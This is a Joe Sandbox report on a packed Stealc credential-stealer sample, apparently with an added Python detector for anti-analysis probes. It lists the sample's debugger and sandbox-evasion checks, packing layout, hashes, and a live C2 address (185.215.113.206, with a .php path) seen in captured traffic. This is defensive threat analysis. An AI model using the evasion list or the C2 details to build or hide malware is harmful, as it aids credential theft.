Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E9F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E9F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E9BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E9BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E9DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E9DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E91160 GetSystemInfo,ExitProcess,0_2_00E91160
Source: file.exe, file.exe, 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2175832040.0000000000BE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2175832040.0000000000C15000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2175832040.0000000000C15000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW_
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13585
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13588
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13604
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13600
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13639
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
(\\.\NTICE, \\.\SICE and \\.\SIWVID are the SoftICE driver device names; a successful CreateFile on any of them tells the sample a kernel debugger is loaded.)
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort (three separate queries)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E945C0 VirtualProtect ?,00000004,00000100,00000000 (flNewProtect 0x100 is PAGE_GUARD; this is the call behind the guard-page signature)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA9750 mov eax, dword ptr fs:[00000030h] (fs:[30h] is the PEB pointer in a 32-bit process; the PEB holds BeingDebugged and NtGlobalFlag)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
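The window-name, device-name and debug-port probes listed above are exactly what a sandbox signature such as "Tries to detect sandboxes and other dynamic analysis tools (window names)" keys on. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it runs that matching logic over an API-call trace. The artefact lists are taken from this section; the trace format and the TRACE lines are constructed for the example; the ATT&CK ids are the standard ones for Debugger Evasion (T1622), Virtualization/Sandbox Evasion: System Checks (T1497.001) and Security Software Discovery (T1518.001).

```python
"""Classify anti-analysis probes in an API-call trace.

Added example. The artefact lists come from the report section above; the
trace format and the TRACE lines are constructed for this example and are
not Joe Sandbox output.
"""
import re
from collections import defaultdict

# Artefacts grouped by what a hit tells the malware. Comparison is done on
# the lower-cased argument with any leading "\\.\" device prefix removed.
ARTEFACTS = {
    "user-mode debugger window": {"ollydbg", "gbdyllo"},
    "sysinternals monitor window": {
        "regmonclass", "filemonclass", "procmon_window_class",
        "process monitor - sysinternals: www.sysinternals.com",
        "registry monitor - sysinternals: www.sysinternals.com",
        "file monitor - sysinternals: www.sysinternals.com",
    },
    "kernel debugger device": {"ntice", "sice", "siwvid"},  # SoftICE drivers
    "hypervisor registry artefact": {"hardware\\acpi\\dsdt\\vbox__"},
}

# Probes recognised by API plus information class rather than by a string.
INFO_CLASS_PROBES = {
    ("NtSetInformationThread", "ThreadHideFromDebugger"): "thread hidden from debugger",
    ("NtQueryInformationProcess", "ProcessDebugPort"): "debug port queried",
}

# ATT&CK mapping used for the summary (standard technique ids).
TECHNIQUE = {
    "user-mode debugger window": "T1622",
    "kernel debugger device": "T1622",
    "thread hidden from debugger": "T1622",
    "debug port queried": "T1622",
    "sysinternals monitor window": "T1518.001",
    "hypervisor registry artefact": "T1497.001",
}

# Constructed trace, one call per line: API(args) -> return value.
TRACE = r'''
FindWindowA("OLLYDBG", NULL) -> 0
FindWindowA("regmonclass", NULL) -> 0
FindWindowA(NULL, "Process Monitor - Sysinternals: www.sysinternals.com") -> 0
CreateFileA("\\.\SICE", GENERIC_READ) -> INVALID_HANDLE_VALUE
CreateFileA("\\.\NTICE", GENERIC_READ) -> INVALID_HANDLE_VALUE
CreateFileA("C:\Users\user\AppData\Local\Temp\out.txt", GENERIC_WRITE) -> 0x1a4
RegOpenKeyExA(HKLM, "HARDWARE\ACPI\DSDT\VBOX__") -> 2
NtSetInformationThread(0xfffffffe, ThreadHideFromDebugger) -> 0
NtQueryInformationProcess(0xffffffff, ProcessDebugPort) -> 0
FindWindowA("Notepad", NULL) -> 0x20456
'''.strip().splitlines()

_CALL = re.compile(r'\s*(\w+)\(')
_QUOTED = re.compile(r'"([^"]*)"')


def normalise(arg: str) -> str:
    """Lower-case and strip the Win32 device prefix so \\.\SICE matches 'sice'."""
    arg = arg.lower()
    if arg.startswith("\\\\.\\"):
        arg = arg[4:]
    return arg


def classify_line(line: str):
    """Return (category, artefact) pairs for every probe found on one line."""
    m = _CALL.match(line)
    if not m:
        return []
    api = m.group(1)
    hits = []
    for arg in _QUOTED.findall(line):
        name = normalise(arg)
        for category, names in ARTEFACTS.items():
            if name in names:
                hits.append((category, name))
    for (probe_api, info_class), category in INFO_CLASS_PROBES.items():
        if api == probe_api and info_class in line:
            hits.append((category, info_class))
    return hits


def summarise(lines):
    """Map each probe category seen in the trace to the set of artefacts hit."""
    seen = defaultdict(set)
    for line in lines:
        for category, artefact in classify_line(line):
            seen[category].add(artefact)
    return dict(seen)


def techniques(summary):
    """Distinct ATT&CK technique ids implied by the summary, sorted."""
    return sorted({TECHNIQUE[c] for c in summary})


def is_evasive(summary, min_categories=2):
    """Flag the trace only when probes from at least two independent categories
    appear: a single FindWindow on a common class name is weak evidence alone."""
    return len(summary) >= min_categories


if __name__ == "__main__":
    s = summarise(TRACE)
    for category, artefacts in sorted(s.items()):
        print(f"{TECHNIQUE[category]:>9}  {category}: {sorted(artefacts)}")
    print("evasive:", is_evasive(s))
```

The two-category threshold is the design choice worth keeping: a lone FindWindow("OLLYDBG") also appears in legitimate licensing code, whereas a SoftICE device open plus a VBOX ACPI key lookup plus ThreadHideFromDebugger in one process, as seen in this sample, has no benign reading.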

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 3184, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: isProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA7B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree (the keyboard-layout and locale check behind the "may stop execution after checking locale" signature)
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2135381078.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3184, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2135381078.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3184, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK mapping. Only techniques with at least one matching signature are listed; the number in parentheses is the signature hit count shown in the matrix. The unmatched cells of the standard matrix grid are omitted.

Execution: Command and Scripting Interpreter (2); Native API (11)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (11); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12)
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact: no matched techniques
Antivirus detection (submitted sample):
Source | Detection | Scanner | Label
file.exe | 44% | Virustotal |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No antivirus matches in the remaining categories (dropped files, unpacked PE files, domains, URLs).
                No contacted domains info
URLs:
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/ | true | | unknown
http://185.215.113.206/e2b1563c6670f193.php | true | | unknown

URLs found in memory strings:
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/3 | file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/e2b1563c6670f193.php- | file.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/e2b1563c6670f193.php/D | file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/M | file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.2175832040.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/e2b1563c6670f193.phpl | file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/ws | file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/e2b1563c6670f193.php4 | file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/e2b1563c6670f193.phpT | file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/e2b1563c6670f193.phpt | file.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
The trailing characters on most of these memory-string hits (/3, .php-, /D, /M, l, /ws, 4, T, t) are most likely adjacent bytes picked up by the string scanner rather than distinct endpoints; the C2 paths supported by the configuration and by the captured traffic are / and /e2b1563c6670f193.php on 185.215.113.206.
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1542683
                                        Start date and time:2024-10-26 07:10:05 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 4s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:file.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 80%
                                        • Number of executed functions: 19
                                        • Number of non-executed functions: 85
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        No simulations
IP context:
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | LummaC, Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | zE8aZ90GHB.exe | malicious | Amadey | 185.215.113.206/k8FppT/index.php
                                        No context
ASN context:
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                                        No context
                                        No context
                                        No created / dropped files found
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.948375836095765
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:file.exe
                                        File size:1'830'912 bytes
                                        MD5:23f03176ddc56b4e531545aaf7394334
                                        SHA1:56dffc71067b0d3896a2fba82b320d8b7f18782e
                                        SHA256:da968f12344c3ccfdfa40421c3688c1761a2ff5054b353582022016e0a05fbe4
                                        SHA512:466ba8dbefa4c4756ad45f3b5da32ba11228700c51ede7cee8168b3ce13f15455484b25284094f2cae21be8342ee7df573068ce3e7640d980b972549f644f4ef
                                        SSDEEP:24576:qpVwz7bh0nI2hjdQD190xLYYt5h752LgX7oieKLo26JBAjfALrOuC6jczE47:qXJIIy9g5h752Ue92+BmAHOlS
                                        TLSH:CA8533720FD132F9C26CCBB788454E0B6690A9739CE2D60E3D2B572FAA9375B17444E4
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0xa91000
                                        Entrypoint Section:.taggant
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
Instructions at the entry point (VA 0xa91000, the first bytes of the .taggant section). Only the leading jmp is real code; the bytes that follow are mostly zeros, which the disassembler renders as "add byte ptr [eax], al", so the rest of the listing is section data rather than a meaningful instruction stream:
                                        jmp 00007F849C70C6FAh
                                        bswap esi
                                        sbb eax, dword ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        jmp 00007F849C70E6F5h
                                        add byte ptr [ebx], al
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dl
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [0000000Ah], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [ecx], al
                                        add byte ptr [eax], 00000000h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        pop es
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+0Ah], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        or byte ptr [eax+00000000h], al
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add ecx, dword ptr [edx]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        xor byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+00000000h], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        or byte ptr [eax+00000000h], al
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add ecx, dword ptr [edx]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        xor byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        sub byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add dword ptr [eax+00000000h], eax
                                        add byte ptr [eax], al
                                        Programming Language:
                                        • [C++] VS2010 build 30319
                                        • [ASM] VS2010 build 30319
                                        • [ C ] VS2010 build 30319
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(name empty or unprintable) | 0x1000 | 0x25b000 | 0x22800 | 8f4a1bb8484b365f335ea4b296c25d0f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(name empty or unprintable) | 0x25e000 | 0x299000 | 0x200 | 34462465f111153475a46e3b883381a6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nnbmymfp | 0x4f7000 | 0x199000 | 0x198e00 | c817282c2be4edccccec0b28efe5f2e3 | False | 0.9949252187786609 | data | 7.953989385913713 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
onazwdcw | 0x690000 | 0x1000 | 0x400 | 9f216bfb69e08aeb1094fcd49d7a9cea | False | 0.7958984375 | data | 6.15350017974742 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x691000 | 0x3000 | 0x2200 | 6f72d93e8e4aca903e55335a1cb80973 | False | 0.05905330882352941 | DOS executable (COM) | 0.7354567351322978 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Every executable section is also writable, the two unnamed sections have a virtual size far larger than their raw size (0x25b000 vs 0x22800 and 0x299000 vs 0x200), nnbmymfp has an entropy of 7.95, and the entry point (0xa91000 minus image base 0x400000 = RVA 0x691000) is the first byte of .taggant. This is the layout of a protector that unpacks into the unnamed regions at run time, which is what the "Detected unpacking (changes PE section rights)" and "Entry point lies outside standard sections" signatures reflect.
                                         | DLL | Import |
                                         | kernel32.dll | lstrcpy |
                                         | Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
                                         | 2024-10-26T07:11:01.630432+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49709 | 185.215.113.206 | 80 | TCP |
                                         | Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                         | Oct 26, 2024 07:11:00.351252079 CEST | 49709 | 80 | 192.168.2.6 | 185.215.113.206 |
                                         | Oct 26, 2024 07:11:00.356709003 CEST | 80 | 49709 | 185.215.113.206 | 192.168.2.6 |
                                         | Oct 26, 2024 07:11:00.356800079 CEST | 49709 | 80 | 192.168.2.6 | 185.215.113.206 |
                                         | Oct 26, 2024 07:11:00.357438087 CEST | 49709 | 80 | 192.168.2.6 | 185.215.113.206 |
                                         | Oct 26, 2024 07:11:00.362725973 CEST | 80 | 49709 | 185.215.113.206 | 192.168.2.6 |
                                         | Oct 26, 2024 07:11:01.327523947 CEST | 80 | 49709 | 185.215.113.206 | 192.168.2.6 |
                                         | Oct 26, 2024 07:11:01.327637911 CEST | 49709 | 80 | 192.168.2.6 | 185.215.113.206 |
                                         | Oct 26, 2024 07:11:01.331181049 CEST | 49709 | 80 | 192.168.2.6 | 185.215.113.206 |
                                         | Oct 26, 2024 07:11:01.336597919 CEST | 80 | 49709 | 185.215.113.206 | 192.168.2.6 |
                                         | Oct 26, 2024 07:11:01.630204916 CEST | 80 | 49709 | 185.215.113.206 | 192.168.2.6 |
                                         | Oct 26, 2024 07:11:01.630431890 CEST | 49709 | 80 | 192.168.2.6 | 185.215.113.206 |
                                         | Oct 26, 2024 07:11:04.065927029 CEST | 49709 | 80 | 192.168.2.6 | 185.215.113.206 |
                                        • 185.215.113.206
                                         | Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
                                         | 0 | 192.168.2.6 | 49709 | 185.215.113.206 | 80 | 3184 | C:\Users\user\Desktop\file.exe |
                                         Timestamp | Bytes transferred | Direction | Data
